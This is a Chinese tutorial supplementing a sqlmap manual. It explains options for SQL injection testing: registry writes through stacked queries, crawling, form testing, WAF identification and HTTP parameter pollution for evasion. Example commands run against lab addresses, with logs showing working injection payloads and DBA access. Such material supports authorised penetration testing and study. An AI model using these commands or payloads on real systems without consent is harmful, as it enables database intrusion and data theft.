sqlmap使用者手冊[續]
《sqlmap使用者手冊》其實只寫了大部分可能用到的引數,還有些並未寫,這次補上~
ps:其實看到zone裡很多問sqlmap的問題在通讀看完那篇文章後都能解決。可惜啊,現在的人通讀看文章的耐心都沒有了,遇到了哪個問題就想起針對這個問題求助,卻不知道仔細看完之後,以後可以省多少時間來求助,吐槽完畢,正文開始:
對Windows登錄檔操作
當資料庫為MySQL,PostgreSQL或Microsoft SQL Server,並且當前web應用支援堆查詢。 當然,當前連線資料庫的使用者也需要有許可權操作登錄檔。
讀取登錄檔值
引數:--reg-read
寫入登錄檔值
引數:--reg-add
刪除登錄檔值
引數:--reg-del
登錄檔輔助選項
引數:--reg-key,--reg-value,--reg-data,--reg-type
需要配合之前三個引數使用,例子:
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
常規引數
從sqlite中讀取session
引數:-s
sqlmap對每一個目標都會在output路徑下自動生成一個SQLite檔案,如果使用者想指定讀取的檔案路徑,就可以用這個引數。
儲存HTTP(S)日誌
引數:-t
這個引數需要跟一個文字檔案,sqlmap會把HTTP(S)請求與響應的日誌儲存到那裡。
非互動模式
引數:--batch
用此引數,不需要使用者輸入,將會使用sqlmap提示的預設值一直執行下去。
強制使用字元編碼
引數:--charset
不使用sqlmap自動識別的(如HTTP頭中的Content-Type)字元編碼,強制指定字元編碼如:
--charset=GBK
爬行網站URL
引數:--crawl
sqlmap可以收集潛在的可能存在漏洞的連線,後面跟的引數是爬行的深度。
例子:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]
規定輸出到CSV中的分隔符
引數:--csv-del
當dump儲存為CSV格式時(--dump-format=CSV),需要一個分隔符預設是逗號,使用者也可以改為別的 如:
--csv-del=";"
DBMS身份驗證
引數:--dbms-cred
某些時候當前使用者的許可權不夠,做某些操作會失敗,如果知道高許可權使用者的密碼,可以使用此引數,有的資料庫有專門的執行機制,可以切換使用者如Microsoft SQL Server的OPENROWSET函式
定義dump資料的格式
引數:--dump-format
輸出的格式可定義為:CSV,HTML,SQLITE
預估完成時間
引數:--eta
可以計算注入資料的剩餘時間。
例如Oracle的布林型盲注:
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========> ] 11/64 ETA 00:19
然後:
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
sqlmap先輸出長度,預計完成時間,顯示百分比,輸出字元
重新整理session檔案
引數:--flush-session
如果不想用之前快取這個目標的session檔案,可以使用這個引數。 會清空之前的session,重新測試該目標。
自動獲取form表單測試
引數:--forms
如果你想對一個頁面的form表單中的引數測試,可以使用-r引數讀取請求檔案,或者透過--data引數測試。 但是當使用--forms引數時,sqlmap會自動從-u中的url獲取頁面中的表單進行測試。
忽略在會話檔案中儲存的查詢結果
引數:--fresh-queries
忽略session檔案儲存的查詢,重新查詢。
使用DBMS的hex函式
引數:--hex
有時候字元編碼的問題,可能導致資料丟失,可以使用hex函式來避免:
針對PostgreSQL例子:
$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]
自定義輸出的路徑
引數:--output-dir
sqlmap預設把session檔案跟結果檔案儲存在output資料夾下,用此引數可自定義輸出路徑 例如:--output-dir=/tmp
從響應中獲取DBMS的錯誤資訊
引數:--parse-errors
有時目標沒有關閉DBMS的報錯,當資料庫語句錯誤時,會輸出錯誤語句,用詞引數可以會顯出錯誤資訊。
$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
其他的一些引數
使用引數縮寫
引數:-z
有使用引數太長太複雜,可以使用縮寫模式。 例如:
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
可以寫成:
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
還有:
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
可以寫成:
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
成功SQL隱碼攻擊時警告
引數:--alert
設定會發的答案
引數:--answers
當希望sqlmap提出輸入時,自動輸入自己想要的答案可以使用此引數: 例子:
$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]
發現SQL隱碼攻擊時發出蜂鳴聲
引數:--beep
發現sql注入時,發出蜂鳴聲。
啟發式檢測WAF/IPS/IDS保護
引數:--check-waf
WAF/IPS/IDS保護可能會對sqlmap造成很大的困擾,如果懷疑目標有此防護的話,可以使用此引數來測試。 sqlmap將會使用一個不存在的引數來注入測試
例如:
&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1
如果有保護的話可能返回結果會不同。
清理sqlmap的UDF(s)和表
引數:--cleanup
清除sqlmap注入時產生的udf與表。
禁用彩色輸出
引數:--disable-coloring
sqlmap預設彩色輸出,可以使用此引數,禁掉彩色輸出。
使用指定的Google結果頁面
引數:--gpage
預設sqlmap使用前100個URL地址作為注入測試,結合此選項,可以指定頁面的URL測試。
使用HTTP引數汙染
引數:-hpp
HTTP引數汙染可能會繞過WAF/IPS/IDS保護機制,這個對ASP/IIS與ASP.NET/IIS平臺很有效。
測試WAF/IPS/IDS保護
引數:--identify-waf
sqlmap可以嘗試找出WAF/IPS/IDS保護,方便使用者做出繞過方式。目前大約支援30種產品的識別。
例如對一個受到ModSecurity WAF保護的MySQL例子:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
[...]
模仿智慧手機
引數:--mobile
有時服務端只接收移動端的訪問,此時可以設定一個手機的User-Agent來模仿手機登陸。
例如:
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
安全的刪除output目錄的檔案
引數:--purge-output
有時需要刪除結果檔案,而不被恢復,可以使用此引數,原有檔案將會被隨機的一些檔案覆蓋。
例如:
$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
啟發式判斷注入
引數:--smart
有時對目標非常多的URL進行測試,為節省時間,只對能夠快速判斷為注入的報錯點進行注入,可以使用此引數。
例子:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
初級使用者嚮導引數
引數:--wizard 面向初級使用者的引數,可以一步一步教你如何輸入針對目標註入。
$ python sqlmap.py --wizard
sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:25:26
Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is running, please wait..
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2986=2986
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user: 'sa'
current database: 'testdb'
current user is DBA: True
[*] shutting down at 11:25:52
相關文章
- sqlmap使用者手冊2020-08-19SQL
- sqlmap使用手冊2022-03-04SQL
- PuTTY使用者手冊2020-12-24
- ZYNQ核心板使用者手冊2024-05-13
- 使用者手冊:智慧家居系統2024-07-26
- CDH 5.7.1單使用者模式部署手冊2019-12-17模式
- MaxCompute 圖計算使用者手冊(下)2019-04-19
- MaxCompute 圖計算使用者手冊(上)2019-04-19
- Stimulsoft Reports使用者手冊:如何建立關係2021-04-19
- 全志A13處理器使用者手冊2019-03-26
- 【轉】[C#] NVelocity 使用者手冊 英文原版2024-09-06C#
- sqlmap的使用2018-07-24SQL
- Sqlmap使用教程2019-07-01SQL
- 手冊2018-08-11
- Abp 實現通過手機號註冊使用者2022-04-11
- tep使用者手冊幫你從unittest過渡到pytest2020-12-23
- vim 使用者手冊第三章 moving around2020-12-20
- Zmap詳細使用者手冊和DDOS的可行性2020-08-19
- sqlmap 進階 (一)2019-03-30SQL
- SQLMAP進階使用2020-08-19SQL
- SQLMAP 例項COOKBOOK2020-08-19SQL
- sqlmap使用,配合Burpsuite2024-07-08SQLUI
- 前端手冊2019-02-16前端
- Redis手冊2024-03-24Redis
- SparkSQL手冊2021-03-26SparkSQL
- MongoDB手冊2021-03-18MongoDB
- AppUse(Android測試平臺)使用者手冊 v2-22020-08-19APPAndroid
- 龍芯LS232使用者手冊晶片資料介紹2019-05-17晶片
- Nmap速查手冊2020-08-19
- JVM指令手冊2020-09-15JVM
- CMD命令手冊2024-09-01
- TypeScript中文手冊2021-09-09TypeScript
- JS速查手冊2021-09-09JS
- Walk手冊(一)2021-01-28
- RPA 快速手冊2024-12-09
- MT8163使用者手冊,MT8163規格書資料2019-01-08
- MT6165_SGLT使用者手冊/晶片設計資料下載2018-12-05晶片
- App annie:使用者獲取權威指導手冊(附下載)2020-09-15APP